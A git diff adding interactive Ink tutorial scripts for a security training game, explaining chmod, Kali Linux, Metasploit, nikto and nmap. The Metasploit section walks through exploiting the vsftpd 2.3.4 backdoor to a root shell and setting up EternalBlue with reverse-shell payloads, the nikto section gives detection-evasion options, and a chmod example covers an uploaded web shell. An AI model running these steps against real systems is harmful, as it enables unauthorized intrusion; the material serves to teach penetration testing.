diff --git a/story_design/ink/tool_help/chmod.ink b/story_design/ink/tool_help/chmod.ink new file mode 100644 index 0000000..a872972 --- /dev/null +++ b/story_design/ink/tool_help/chmod.ink @@ -0,0 +1,333 @@ +// =========================================== +// TOOL HELP: CHMOD +// Break Escape Universe +// =========================================== +// Educational content about chmod and file permissions +// For use in training scenarios and missions +// =========================================== + +=== chmod_help === + +Guide: chmod—"change mode"—is a fundamental Linux/Unix command for managing file permissions. + +Guide: Understanding permissions is critical in security work. Misconfigured permissions are a common vulnerability, and you'll often need to modify permissions during operations. + ++ [What are file permissions?] + -> chmod_permissions_basics + ++ [How do I read permission notation?] + -> chmod_reading_permissions + ++ [How do I use chmod?] + -> chmod_usage + ++ [What are the numeric codes?] + -> chmod_numeric + ++ [Show me common examples] + -> chmod_examples + ++ [I understand now] + -> chmod_end + +// ---------------- +// Permissions basics +// ---------------- + +=== chmod_permissions_basics === + +Guide: Every file and directory in Linux has three types of permissions: + +Guide: **Read (r)**: Permission to view file contents or list directory contents +**Write (w)**: Permission to modify file contents or create/delete files in a directory +**Execute (x)**: Permission to run a file as a program, or access a directory + +Guide: These permissions are set for three categories of users: + +Guide: **Owner (u)**: The user who owns the file +**Group (g)**: Users who are members of the file's group +**Others (o)**: Everyone else + +Guide: Think of it as a security matrix: for each file, you define what the owner can do, what the group can do, and what everyone else can do. + +Guide: When you run `ls -l`, you see permissions like this: +``` +-rw-r--r-- 1 user group 1234 Jan 1 12:00 file.txt +``` + +Guide: That first part `-rw-r--r--` shows the permissions. Let's break it down: +- First character: File type (`-` for file, `d` for directory, `l` for symlink) +- Next three: Owner permissions (`rw-` = read and write, no execute) +- Next three: Group permissions (`r--` = read only) +- Last three: Others permissions (`r--` = read only) + +* [How do I read this notation?] + -> chmod_reading_permissions + +* [How do I change permissions?] + -> chmod_usage + +* [What are the numeric codes?] + -> chmod_numeric + +* [Show me examples] + -> chmod_examples + +// ---------------- +// Reading permissions +// ---------------- + +=== chmod_reading_permissions === + +Guide: Let's decode permission strings step by step. + +Guide: **Example 1**: `-rwxr-xr-x` +- `-`: Regular file +- `rwx`: Owner can read, write, and execute +- `r-x`: Group can read and execute, but not write +- `r-x`: Others can read and execute, but not write + +Guide: This might be an executable script that everyone can run, but only the owner can modify. + +Guide: **Example 2**: `drwxrwx---` +- `d`: Directory +- `rwx`: Owner has full access (read, write, execute = can enter and modify directory) +- `rwx`: Group has full access +- `---`: Others have no access at all + +Guide: This is a shared directory for a specific group, completely private from other users. + +Guide: **Example 3**: `-rw-------` +- `-`: Regular file +- `rw-`: Owner can read and write +- `---`: Group has no access +- `---`: Others have no access + +Guide: This is a private file, like you might use for sensitive data or SSH keys. + +Guide: **Example 4**: `-rwsr-xr-x` +- Notice the `s` instead of `x` in owner permissions +- This is a special "setuid" bit +- When executed, the program runs with owner privileges, not the user's privileges +- This is powerful and potentially dangerous! + +* [How do I change these permissions?] + -> chmod_usage + +* [Explain the basics again] + -> chmod_permissions_basics + +* [What are the numeric codes?] + -> chmod_numeric + +* [Show me examples] + -> chmod_examples + +// ---------------- +// Using chmod +// ---------------- + +=== chmod_usage === + +Guide: chmod has two modes: symbolic and numeric. Let's cover both. + +Guide: **SYMBOLIC MODE:** + +Guide: Basic syntax: `chmod [who][operation][permissions] filename` + +Guide: **Who:** +- `u` = user (owner) +- `g` = group +- `o` = others +- `a` = all (everyone) + +Guide: **Operation:** +- `+` = add permission +- `-` = remove permission +- `=` = set exact permission + +Guide: **Permissions:** +- `r` = read +- `w` = write +- `x` = execute + +Guide: **Examples:** +- `chmod u+x script.sh` - Add execute permission for owner +- `chmod g-w file.txt` - Remove write permission for group +- `chmod o+r document.txt` - Add read permission for others +- `chmod a+x program` - Add execute permission for everyone +- `chmod u=rwx,g=rx,o=r file.txt` - Set exact permissions for each category + +Guide: **Common patterns:** +- `chmod +x script.sh` - Make executable (shorthand for a+x) +- `chmod -w file.txt` - Make read-only +- `chmod u+x,go-rwx private_script.sh` - Executable only by owner + +* [Tell me about numeric mode] + -> chmod_numeric + +* [Show me practical examples] + -> chmod_examples + +* [Explain permissions again] + -> chmod_permissions_basics + +* [I understand now] + -> chmod_end + +// ---------------- +// Numeric mode +// ---------------- + +=== chmod_numeric === + +Guide: Numeric (octal) mode is faster once you learn it. Each permission has a value: + +Guide: **Permission values:** +- `r` (read) = 4 +- `w` (write) = 2 +- `x` (execute) = 1 +- No permission = 0 + +Guide: You add them up for each category: +- `rwx` = 4+2+1 = 7 +- `rw-` = 4+2+0 = 6 +- `r-x` = 4+0+1 = 5 +- `r--` = 4+0+0 = 4 +- `---` = 0+0+0 = 0 + +Guide: Then you provide three digits: owner, group, others. + +Guide: **Common permission codes:** + +Guide: **755** (`rwxr-xr-x`): +Owner has full control, everyone can read and execute +Common for executable scripts and programs + +Guide: **644** (`rw-r--r--`): +Owner can modify, everyone can read +Common for regular files and documents + +Guide: **600** (`rw-------`): +Only owner can read and write, no one else has access +Common for private files, SSH keys, credentials + +Guide: **700** (`rwx------`): +Only owner has full control, no one else can access +Common for private directories + +Guide: **666** (`rw-rw-rw-`): +Everyone can read and write (generally not recommended!) +Potentially insecure + +Guide: **777** (`rwxrwxrwx`): +Full permissions for everyone (dangerous!) +Almost never a good idea in production + +Guide: **Usage:** +- `chmod 755 script.sh` +- `chmod 600 id_rsa` +- `chmod 644 config.txt` + +* [Show me practical examples] + -> chmod_examples + +* [Explain symbolic mode] + -> chmod_usage + +* [What do permissions mean?] + -> chmod_permissions_basics + +* [I'm ready to use chmod] + -> chmod_end + +// ---------------- +// Examples +// ---------------- + +=== chmod_examples === + +Guide: Let's walk through real-world scenarios: + +Guide: **Scenario 1: Making a script executable** +You download a Python script and want to run it: +``` +$ ls -l script.py +-rw-r--r-- 1 user group 1234 Jan 1 12:00 script.py +$ chmod +x script.py +$ ls -l script.py +-rwxr-xr-x 1 user group 1234 Jan 1 12:00 script.py +$ ./script.py +(script runs) +``` + +Guide: **Scenario 2: Securing SSH private key** +SSH will refuse to use a private key with loose permissions: +``` +$ chmod 600 ~/.ssh/id_rsa +``` +Now only you can read or write your private key. Required for security. + +Guide: **Scenario 3: Creating a shared group directory** +Team members need to collaborate: +``` +$ mkdir shared_project +$ chmod 770 shared_project +$ chgrp developers shared_project +``` +Now all members of the "developers" group can fully access it, but others cannot. + +Guide: **Scenario 4: Making a file read-only** +You have a configuration you don't want accidentally modified: +``` +$ chmod 444 important_config.conf +``` +Now no one can write to it (you'd need to chmod again to modify it). + +Guide: **Scenario 5: After uploading a web shell (penetration testing)** +You've uploaded exploit.php to a web server: +``` +$ chmod 755 exploit.php +``` +Now the web server can execute it (as can you), but it's not writable by others. + +Guide: **Scenario 6: Recursive permissions for a directory** +Set permissions for a directory and everything inside: +``` +$ chmod -R 755 /var/www/website/ +``` +The `-R` flag applies recursively to all files and subdirectories. + +* [Explain numeric codes again] + -> chmod_numeric + +* [Tell me about symbolic mode] + -> chmod_usage + +* [What are permissions?] + -> chmod_permissions_basics + +* [I'm ready to practice] + -> chmod_end + +// ---------------- +// End +// ---------------- + +=== chmod_end === + +Guide: Understanding chmod is essential for Linux security work. You'll use it constantly for: +- Securing sensitive files +- Making scripts executable +- Fixing permission vulnerabilities +- Post-exploitation activities + +Guide: Key principles: +- **Principle of least privilege**: Grant only the permissions needed +- **Protect private keys**: Always use 600 or 400 for SSH keys +- **Be cautious with 777**: World-writable permissions are usually dangerous +- **Check before you change**: Use `ls -l` to see current permissions first + +Guide: Practice in a safe environment until chmod becomes second nature. + +-> END diff --git a/story_design/ink/tool_help/kali_linux.ink b/story_design/ink/tool_help/kali_linux.ink new file mode 100644 index 0000000..c207987 --- /dev/null +++ b/story_design/ink/tool_help/kali_linux.ink @@ -0,0 +1,127 @@ +// =========================================== +// TOOL HELP: KALI LINUX +// Break Escape Universe +// =========================================== +// Educational content about Kali Linux +// For use in training scenarios and missions +// =========================================== + +=== kali_linux_help === + +Guide: Kali Linux is a specialized Debian-based Linux distribution designed for penetration testing and security auditing. + +Guide: Think of it as a Swiss Army knife for security professionals—it comes pre-loaded with hundreds of security tools, all configured and ready to use. + ++ [What makes Kali special?] + -> kali_special + ++ [What tools does it include?] + -> kali_tools + ++ [How do I get started with Kali?] + -> kali_getting_started + ++ [I understand now] + -> kali_end + +// ---------------- +// What makes Kali special +// ---------------- + +=== kali_special === + +Guide: Several things set Kali apart from regular Linux distributions: + +Guide: First, it's purpose-built. Every tool, every default setting, every package is chosen for security testing. You don't need to spend days installing and configuring tools. + +Guide: Second, it's actively maintained by Offensive Security, the company behind the OSCP certification. They keep the tools updated and ensure everything works together. + +Guide: Third, it's flexible. You can run it from a USB drive without installing anything, run it in a virtual machine, or install it as your main operating system. + +Guide: Fourth, it's documented extensively. Almost every tool has built-in help, and the Kali documentation is comprehensive. + +* [Tell me about the tools available] + -> kali_tools + +* [How do I start using it?] + -> kali_getting_started + +* [I'm ready to move on] + -> kali_end + +// ---------------- +// Tools included +// ---------------- + +=== kali_tools === + +Guide: Kali includes over 600 penetration testing tools, organized by category: + +Guide: **Information Gathering**: Tools like nmap, Recon-ng, and theHarvester for reconnaissance and mapping networks. + +Guide: **Vulnerability Analysis**: Scanners like nikto, OpenVAS, and sqlmap that identify weaknesses in systems. + +Guide: **Exploitation**: Metasploit Framework, exploit-db, and other tools for testing discovered vulnerabilities. + +Guide: **Password Attacks**: John the Ripper, Hashcat, and Hydra for password testing and recovery. + +Guide: **Wireless Attacks**: Aircrack-ng suite for testing wireless network security. + +Guide: **Forensics**: Tools for investigating compromised systems and analyzing evidence. + +Guide: The beauty is that these tools work together. You might use nmap to find open ports, nikto to scan a web server, and Metasploit to test a vulnerability. + +* [How do I get started with Kali?] + -> kali_getting_started + +* [Tell me more about what makes it special] + -> kali_special + +* [That's helpful, thanks] + -> kali_end + +// ---------------- +// Getting started +// ---------------- + +=== kali_getting_started === + +Guide: Getting started with Kali is straightforward: + +Guide: **Option 1: Virtual Machine** (Recommended for beginners) +Download a Kali VM image from kali.org and run it in VirtualBox or VMware. Safe, isolated, and easy to snapshot if something breaks. + +Guide: **Option 2: Live Boot** +Create a bootable USB drive with Kali. You can boot any computer into Kali without installing anything. Great for portability. + +Guide: **Option 3: Full Installation** +Install Kali as your main operating system. Most flexible, but requires dedicating a machine to it. + +Guide: Once you're in Kali, start with the basics: +- Update your system: `sudo apt update && sudo apt upgrade` +- Explore the Applications menu to see available tools +- Read the documentation at docs.kali.org +- Start with simple tools like nmap before moving to complex frameworks + +Guide: Remember: Kali is powerful. Only use it on systems you own or have explicit permission to test. Unauthorized access is illegal. + +* [Tell me about specific tools] + -> kali_tools + +* [What makes Kali different from other Linux?] + -> kali_special + +* [I'm ready to start practicing] + -> kali_end + +// ---------------- +// End +// ---------------- + +=== kali_end === + +Guide: Good luck with Kali. Remember: these tools are powerful. Use them responsibly, ethically, and only with proper authorization. + +Guide: The security community values ethical behavior. Keep it legal, keep it authorized, and keep learning. + +-> END diff --git a/story_design/ink/tool_help/metasploit.ink b/story_design/ink/tool_help/metasploit.ink new file mode 100644 index 0000000..c065b01 --- /dev/null +++ b/story_design/ink/tool_help/metasploit.ink @@ -0,0 +1,366 @@ +// =========================================== +// TOOL HELP: METASPLOIT FRAMEWORK +// Break Escape Universe +// =========================================== +// Educational content about Metasploit +// For use in training scenarios and missions +// =========================================== + +=== metasploit_help === + +Guide: The Metasploit Framework is the world's most used penetration testing framework. + +Guide: Think of it as a massive, organized library of exploits, payloads, and security tools. It automates much of the complex work involved in exploiting vulnerabilities. + +Guide: It's maintained by Rapid7 and used by both penetration testers and security researchers worldwide. + ++ [How do I start Metasploit?] + -> metasploit_starting + ++ [How do I find an exploit?] + -> metasploit_finding_exploits + ++ [How do I run an exploit?] + -> metasploit_running_exploits + ++ [What's the workflow?] + -> metasploit_workflow + ++ [Show me a complete example] + -> metasploit_example + ++ [I understand now] + -> metasploit_end + +// ---------------- +// Starting Metasploit +// ---------------- + +=== metasploit_starting === + +Guide: To start Metasploit, you use the Metasploit Console—`msfconsole`: + +Guide: Simply type: +`msfconsole` + +Guide: You'll see ASCII art (different each time) and then the msf6 prompt: +`msf6 >` + +Guide: This is your command center. From here, you can search for exploits, configure them, run them, and manage sessions. + +Guide: **Basic commands to know:** +- `help` - Shows available commands +- `search [term]` - Search for exploits, payloads, or modules +- `use [module]` - Select a module to configure +- `show options` - Display configuration options for current module +- `set [option] [value]` - Configure a module parameter +- `run` or `exploit` - Execute the module +- `back` - Return to main menu +- `exit` - Quit msfconsole + +* [How do I find exploits?] + -> metasploit_finding_exploits + +* [How do I run an exploit?] + -> metasploit_running_exploits + +* [Show me the workflow] + -> metasploit_workflow + +* [I'm ready to practice] + -> metasploit_end + +// ---------------- +// Finding exploits +// ---------------- + +=== metasploit_finding_exploits === + +Guide: Finding the right exploit is crucial. Metasploit makes this easier with its search functionality. + +Guide: **Search by service:** +`search apache` +Finds all modules related to Apache + +Guide: **Search by CVE number:** +`search cve:2017-0144` +Finds exploits for a specific vulnerability (in this case, EternalBlue) + +Guide: **Search by platform:** +`search platform:windows` +Finds Windows-specific modules + +Guide: **Search by type:** +`search type:exploit` +`search type:auxiliary` +`search type:payload` + +Guide: **Combined search:** +`search apache type:exploit platform:linux` + +Guide: **Understanding search results:** +``` +Name Rank Description +---- ---- ----------- +exploit/unix/webapp/apache_mod_cgi_bash_env_exec excellent Apache mod_cgi Bash Environment Variable Injection +``` + +Guide: - **Name**: The module path you'll use with `use` +- **Rank**: Reliability rating (excellent, great, good, normal, average, low, manual) +- **Description**: What the exploit does + +Guide: **Rank meanings:** +- **Excellent**: Exploit never crashes, always works +- **Great**: Common, reliable exploit +- **Good**: Usually reliable +- **Normal**: Works in common scenarios +- **Low**: May crash target or only work in specific conditions + +* [How do I use an exploit once I find it?] + -> metasploit_running_exploits + +* [Show me the complete workflow] + -> metasploit_workflow + +* [Show me a full example] + -> metasploit_example + +* [How do I start Metasploit again?] + -> metasploit_starting + +// ---------------- +// Running exploits +// ---------------- + +=== metasploit_running_exploits === + +Guide: Once you've found an exploit, here's how to run it: + +Guide: **Step 1: Select the exploit** +`use exploit/windows/smb/ms17_010_eternalblue` + +Guide: Your prompt changes to show you're in that module: +`msf6 exploit(windows/smb/ms17_010_eternalblue) >` + +Guide: **Step 2: View required options** +`show options` + +Guide: This displays all configurable parameters: +``` +Name Current Setting Required Description +---- --------------- -------- ----------- +RHOSTS yes Target address +RPORT 445 yes Target port +``` + +Guide: **Step 3: Configure the exploit** +`set RHOSTS 192.168.1.50` + +Guide: RHOSTS is the target (Remote HOST). Some exploits also need: +- `RPORT` - Target port (usually has a default) +- `LHOST` - Your IP address (Local HOST) for callback connections +- `LPORT` - Your listening port + +Guide: **Step 4: Select a payload** +`show payloads` + +Guide: This shows compatible payloads. A payload is what runs after exploitation succeeds. Common choices: +- `windows/meterpreter/reverse_tcp` - Opens a powerful shell back to you +- `cmd/unix/reverse_bash` - Simple shell +- `windows/x64/meterpreter/reverse_https` - Encrypted shell + +Guide: Set your payload: +`set payload windows/x64/meterpreter/reverse_tcp` + +Guide: **Step 5: Configure payload options** +`set LHOST 192.168.1.100` (your IP address) + +Guide: **Step 6: Run the exploit** +`exploit` or `run` + +Guide: If successful, you'll get a Meterpreter session or shell! + +* [Show me a complete example] + -> metasploit_example + +* [Explain the workflow again] + -> metasploit_workflow + +* [How do I find exploits?] + -> metasploit_finding_exploits + +* [I'm ready to practice] + -> metasploit_end + +// ---------------- +// Workflow overview +// ---------------- + +=== metasploit_workflow === + +Guide: Here's the typical Metasploit workflow: + +Guide: **1. Reconnaissance** +Use nmap or other tools to identify targets, open ports, and service versions. +Example: `nmap -sV 192.168.1.50` reveals FTP on port 21, version vsftpd 2.3.4 + +Guide: **2. Search for exploit** +`search vsftpd` +Finds: `exploit/unix/ftp/vsftpd_234_backdoor` + +Guide: **3. Select exploit** +`use exploit/unix/ftp/vsftpd_234_backdoor` + +Guide: **4. Configure target** +``` +set RHOSTS 192.168.1.50 +show options +``` + +Guide: **5. Select payload** (if needed) +``` +show payloads +set payload cmd/unix/interact +``` + +Guide: **6. Verify configuration** +`show options` +Make sure all Required options are set + +Guide: **7. Run exploit** +`exploit` + +Guide: **8. Interact with session** +If successful, you now have access to the target system. Use appropriate post-exploitation modules or manual commands. + +Guide: **9. Clean up** +Professional testing includes removing traces and documenting findings. + +* [Show me a complete example] + -> metasploit_example + +* [How do I find exploits again?] + -> metasploit_finding_exploits + +* [How do I run exploits?] + -> metasploit_running_exploits + +* [I'm ready to practice] + -> metasploit_end + +// ---------------- +// Complete example +// ---------------- + +=== metasploit_example === + +Guide: Let's walk through a complete example: exploiting a vulnerable FTP service. + +Guide: **Scenario**: nmap revealed a target at 192.168.1.50 running vsftpd 2.3.4 on port 21. + +Guide: **Step-by-step:** + +Guide: 1. Start Metasploit: +``` +$ msfconsole +msf6 > +``` + +Guide: 2. Search for vsftpd exploits: +``` +msf6 > search vsftpd + +Matching Modules +================ +Name Rank Description +---- ---- ----------- +exploit/unix/ftp/vsftpd_234_backdoor excellent VSFTPD v2.3.4 Backdoor Command Execution +``` + +Guide: 3. Select the exploit: +``` +msf6 > use exploit/unix/ftp/vsftpd_234_backdoor +msf6 exploit(unix/ftp/vsftpd_234_backdoor) > +``` + +Guide: 4. View options: +``` +msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options + +Module options: +Name Current Setting Required Description +---- --------------- -------- ----------- +RHOSTS yes Target address +RPORT 21 yes Target port +``` + +Guide: 5. Configure target: +``` +msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.50 +RHOSTS => 192.168.1.50 +``` + +Guide: 6. Check the payload (this exploit has an automatic payload): +``` +msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options + +Payload options: +Name Current Setting Required Description +---- --------------- -------- ----------- +(No additional configuration needed for this exploit) +``` + +Guide: 7. Run the exploit: +``` +msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit + +[*] 192.168.1.50:21 - Banner: 220 (vsFTPd 2.3.4) +[*] 192.168.1.50:21 - USER: 331 Please specify the password. +[+] 192.168.1.50:21 - Backdoor service has been spawned, handling... +[+] 192.168.1.50:21 - UID: uid=0(root) gid=0(root) +[*] Found shell. +[*] Command shell session 1 opened +``` + +Guide: 8. You now have a shell! Interact with it: +``` +id +uid=0(root) gid=0(root) + +whoami +root +``` + +Guide: Success! You've exploited the target and have root access. + +* [Explain the workflow again] + -> metasploit_workflow + +* [How do I find other exploits?] + -> metasploit_finding_exploits + +* [How do I run exploits?] + -> metasploit_running_exploits + +* [I'm ready to practice] + -> metasploit_end + +// ---------------- +// End +// ---------------- + +=== metasploit_end === + +Guide: Critical reminder: Metasploit is an extremely powerful tool capable of compromising systems. + +Guide: **Only use it:** +- On systems you own +- On systems where you have explicit written authorization to test +- In lab environments designed for practice +- In authorized CTF competitions + +Guide: Unauthorized use of Metasploit against systems you don't own is illegal and can result in criminal prosecution. + +Guide: With great power comes great responsibility. Use Metasploit ethically, professionally, and always with authorization. + +-> END diff --git a/story_design/ink/tool_help/nikto.ink b/story_design/ink/tool_help/nikto.ink new file mode 100644 index 0000000..47dbddb --- /dev/null +++ b/story_design/ink/tool_help/nikto.ink @@ -0,0 +1,416 @@ +// =========================================== +// TOOL HELP: NIKTO +// Break Escape Universe +// =========================================== +// Educational content about nikto web scanner +// For use in training scenarios and missions +// =========================================== + +=== nikto_help === + +Guide: Nikto is an open-source web server scanner that performs comprehensive tests against web servers. + +Guide: Think of it as a specialized security audit tool for web applications. It checks for thousands of potentially dangerous files, outdated software, configuration issues, and known vulnerabilities. + +Guide: It's been around since 2001 and is a staple in every penetration tester's toolkit. + ++ [What does nikto do?] + -> nikto_functionality + ++ [How do I run a basic scan?] + -> nikto_basic_scan + ++ [What options are available?] + -> nikto_options + ++ [Show me practical examples] + -> nikto_examples + ++ [How do I read the output?] + -> nikto_output + ++ [I understand now] + -> nikto_end + +// ---------------- +// Functionality +// ---------------- + +=== nikto_functionality === + +Guide: Nikto performs comprehensive web server security checks: + +Guide: **What it detects:** +- Outdated server software versions with known vulnerabilities +- Dangerous files and programs (admin interfaces, backup files, test scripts) +- Configuration issues (directory indexing, default files) +- Insecure headers and cookies +- Over 6,700 potentially dangerous files/CGIs +- Outdated components (plugins, frameworks) +- Common vulnerabilities (XSS potential, SQL injection entry points) + +Guide: **How it works:** +Nikto sends thousands of HTTP requests to the target, analyzing responses for security issues. It checks: +- Server headers and banners +- File and directory existence +- Common misconfigurations +- Known vulnerability patterns + +Guide: **Strengths:** +- Fast and automated +- Comprehensive vulnerability database +- Regularly updated +- Finds issues human reviewers might miss +- Good for initial reconnaissance + +Guide: **Limitations:** +- Very noisy—generates tons of log entries +- Can trigger IDS/IPS alerts +- Doesn't test authentication-protected areas +- Only tests for known issues, not zero-days +- Can produce false positives + +* [How do I run nikto?] + -> nikto_basic_scan + +* [What options does it have?] + -> nikto_options + +* [Show me examples] + -> nikto_examples + +* [I'm ready to practice] + -> nikto_end + +// ---------------- +// Basic scanning +// ---------------- + +=== nikto_basic_scan === + +Guide: The basic nikto syntax is simple: + +Guide: **Most basic scan:** +``` +nikto -h http://target.com +``` + +Guide: The `-h` flag specifies the host (target). Nikto will: +1. Identify the web server +2. Check for server vulnerabilities +3. Test for dangerous files +4. Look for configuration issues +5. Generate a detailed report + +Guide: **Common variations:** + +Guide: **Scan HTTPS:** +``` +nikto -h https://target.com +``` +Tests SSL/TLS configuration and certificate issues + +Guide: **Scan specific port:** +``` +nikto -h http://target.com -p 8080 +``` +Many applications run on non-standard ports + +Guide: **Scan with custom port and SSL:** +``` +nikto -h https://target.com:8443 +``` + +Guide: **Scan multiple ports:** +``` +nikto -h target.com -p 80,443,8080,8443 +``` +Checks all specified ports + +Guide: **Basic authentication:** +``` +nikto -h http://target.com -id username:password +``` +For sites requiring HTTP basic auth + +* [What other options are available?] + -> nikto_options + +* [Show me practical examples] + -> nikto_examples + +* [How do I read the results?] + -> nikto_output + +* [What does nikto check for?] + -> nikto_functionality + +// ---------------- +// Options +// ---------------- + +=== nikto_options === + +Guide: Nikto offers many options to customize your scans: + +Guide: **Tuning options** (`-Tuning`) +Controls which tests to run: +``` +nikto -h target.com -Tuning 1 +``` +- 1: Interesting files +- 2: Misconfiguration +- 3: Information disclosure +- 4: Injection (XSS/script/HTML) +- 5: Remote file retrieval +- 6: Denial of service +- 7: Remote file retrieval (server-wide) +- 8: Command execution / remote shell +- 9: SQL injection +- 0: File upload +- a: Authentication bypass +- b: Software identification +- c: Remote source inclusion +- x: Reverse tuning (scan everything except specified) + +Guide: **Output options:** +``` +nikto -h target.com -o results.html -Format html +``` +Saves results in various formats: txt, xml, html, csv, json + +Guide: **Speed control:** +``` +nikto -h target.com -Display V -Pause 2 +``` +- `-Display V`: Verbose output +- `-Pause N`: Pause N seconds between requests (reduces detection) + +Guide: **SSL options:** +``` +nikto -h https://target.com -ssl -nossl +``` +- `-ssl`: Force SSL mode +- `-nossl`: Disable SSL + +Guide: **User agent:** +``` +nikto -h target.com -useragent "Mozilla/5.0..." +``` +Custom user agent string to avoid detection + +Guide: **Evasion techniques:** +``` +nikto -h target.com -evasion 1 +``` +- 1: Random URI encoding +- 2: Directory self-reference (/./) +- 3: Premature URL ending +- 4: Prepend long random string +- 5: Fake parameter +- 6: TAB as request spacer +- 7: Change case in URL +- 8: Use Windows directory separator + +Guide: **Mutate options:** +``` +nikto -h target.com -mutate 1 +``` +- 1: Test all files with all root directories +- 2: Guess for password file names +- 3: Enumerate user names via Apache (/~user type requests) +- 4: Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests) +- 5: Attempt to brute force sub-domain names +- 6: Attempt to guess directory names from dictionary file + +* [Show me practical examples] + -> nikto_examples + +* [How do I run a basic scan?] + -> nikto_basic_scan + +* [How do I read the output?] + -> nikto_output + +* [What does nikto do?] + -> nikto_functionality + +// ---------------- +// Examples +// ---------------- + +=== nikto_examples === + +Guide: Let's walk through real-world scanning scenarios: + +Guide: **Scenario 1: Initial web server assessment** +``` +nikto -h http://192.168.1.50 +``` +Standard scan. Quick overview of vulnerabilities and misconfigurations. + +Guide: **Scenario 2: Thorough HTTPS scan with output** +``` +nikto -h https://target.com -o scan_results.html -Format html +``` +Scans HTTPS site, saves detailed HTML report for later review. + +Guide: **Scenario 3: Stealthy scan** +``` +nikto -h target.com -Pause 5 -evasion 1 -useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" +``` +Slower scan with evasion, pauses between requests, uses realistic user agent to avoid detection. + +Guide: **Scenario 4: Focus on specific vulnerabilities** +``` +nikto -h target.com -Tuning 9 +``` +Only tests for SQL injection vulnerabilities. Faster, more focused scan. + +Guide: **Scenario 5: Multiple targets** +Create a file `targets.txt`: +``` +http://target1.com +http://target2.com +https://target3.com:8443 +``` +Then scan: +``` +nikto -h targets.txt -o results.html -Format html +``` + +Guide: **Scenario 6: Authenticated scan** +``` +nikto -h http://intranet.company.com -id admin:password123 +``` +Scans internal site requiring HTTP basic authentication. + +Guide: **Scenario 7: Complete scan with all options** +``` +nikto -h https://target.com -ssl -p 443,8443 -Tuning 123456789ab -o detailed_scan.html -Format html -Display V +``` +Comprehensive scan: multiple ports, all test types, detailed output, verbose display. + +* [How do I read these results?] + -> nikto_output + +* [Tell me about options again] + -> nikto_options + +* [How do I do a basic scan?] + -> nikto_basic_scan + +* [What does nikto check for?] + -> nikto_functionality + +// ---------------- +// Reading output +// ---------------- + +=== nikto_output === + +Guide: Understanding nikto output is crucial. Let's break down a typical scan: + +Guide: **Header information:** +``` +- Nikto v2.1.6 +--------------------------------------------------------------------------- ++ Target IP: 192.168.1.50 ++ Target Hostname: target.com ++ Target Port: 80 ++ Start Time: 2024-01-15 10:30:00 +--------------------------------------------------------------------------- +``` +Basic scan parameters + +Guide: **Server identification:** +``` ++ Server: Apache/2.4.29 (Ubuntu) ++ The anti-clickjacking X-Frame-Options header is not present. ++ The X-XSS-Protection header is not defined. ++ The X-Content-Type-Options header is not set. +``` +These are configuration issues—not critical but worth noting. + +Guide: **Vulnerability findings:** +``` ++ OSVDB-3268: /config/: Directory indexing found. ++ OSVDB-3092: /admin/: This might be interesting... ++ OSVDB-3233: /icons/README: Apache default file found. +``` +Each line shows: +- OSVDB number (vulnerability database reference) +- Path found +- Description of the issue + +Guide: **Critical findings look like:** +``` ++ OSVDB-877: HTTP TRACE method is active, suggesting vulnerability to XST ++ /admin/login.php: Admin login page found ++ /backup.sql: Database backup file found (possible data exposure) ++ /test.php: PHP test file found (possible info disclosure) +``` + +Guide: **Severity assessment:** +- **Critical**: Exposed admin panels, backup files, database files, shell access +- **High**: Vulnerable software versions, dangerous files, command execution +- **Medium**: Information disclosure, configuration issues, outdated components +- **Low**: Missing security headers, directory indexing, default files + +Guide: **End summary:** +``` ++ 26522 requests: 0 error(s) and 14 item(s) reported on remote host ++ End Time: 2024-01-15 10:45:32 (932 seconds) +--------------------------------------------------------------------------- ++ 1 host(s) tested +``` + +Guide: **What to prioritize:** +1. Exposed admin interfaces +2. Backup or database files accessible +3. Vulnerable software versions (check exploit databases) +4. File upload capabilities +5. Information disclosure issues +6. Configuration weaknesses + +* [Show me scan examples again] + -> nikto_examples + +* [Tell me about scan options] + -> nikto_options + +* [How do I run a basic scan?] + -> nikto_basic_scan + +* [I'm ready to use nikto] + -> nikto_end + +// ---------------- +// End +// ---------------- + +=== nikto_end === + +Guide: Important considerations for using nikto: + +Guide: **Ethical usage:** +- Only scan systems you own or have written authorization to test +- Nikto is extremely noisy—it WILL be logged and detected +- Unauthorized scanning is illegal and can result in criminal charges + +Guide: **Operational considerations:** +- Nikto is loud—not for stealth operations +- Can trigger IDS/IPS alerts +- May impact server performance (thousands of requests) +- Use during authorized testing windows + +Guide: **Best practices:** +- Run nikto as part of a comprehensive assessment, not alone +- Verify findings manually—false positives occur +- Document all findings for your report +- Follow up critical findings with deeper testing +- Keep nikto updated (`nikto -update`) + +Guide: Use nikto responsibly, professionally, and only with proper authorization. + +-> END diff --git a/story_design/ink/tool_help/nmap.ink b/story_design/ink/tool_help/nmap.ink new file mode 100644 index 0000000..2825ab0 --- /dev/null +++ b/story_design/ink/tool_help/nmap.ink @@ -0,0 +1,207 @@ +// =========================================== +// TOOL HELP: NMAP +// Break Escape Universe +// =========================================== +// Educational content about nmap and port scanning +// For use in training scenarios and missions +// =========================================== + +=== nmap_help === + +Guide: nmap—Network Mapper—is the industry standard for network discovery and security auditing. + +Guide: Think of it as a sophisticated radar for networks. It tells you what hosts are alive, what services they're running, and even what operating systems they use. + +Guide: For a penetration tester, nmap is typically the first tool you reach for. You need to know what's out there before you can assess it. + ++ [How do I scan for open ports?] + -> nmap_basic_scan + ++ [What are ports anyway?] + -> nmap_ports_explained + ++ [What scanning options does nmap have?] + -> nmap_scan_types + ++ [Show me practical examples] + -> nmap_examples + ++ [I understand now] + -> nmap_end + +// ---------------- +// Ports explained +// ---------------- + +=== nmap_ports_explained === + +Guide: Good question. Let's establish the basics first. + +Guide: Imagine a computer as a large building. The IP address is the street address, but the building has many doors—each numbered. Those doors are **ports**. + +Guide: Each port can host a different service: +- Port 22: SSH (secure remote access) +- Port 80: HTTP (websites) +- Port 443: HTTPS (secure websites) +- Port 3389: RDP (Windows remote desktop) +- Port 3306: MySQL (database) + +Guide: There are 65,535 possible ports (numbered 0-65535). Services can run on any port, but they typically use standard "well-known ports" for convenience. + +Guide: When you scan for open ports, you're knocking on each door to see if someone answers. An "open" port means a service is listening and will respond. A "closed" port refuses connection. A "filtered" port is blocked by a firewall. + +* [How do I scan these ports with nmap?] + -> nmap_basic_scan + +* [What scan types are available?] + -> 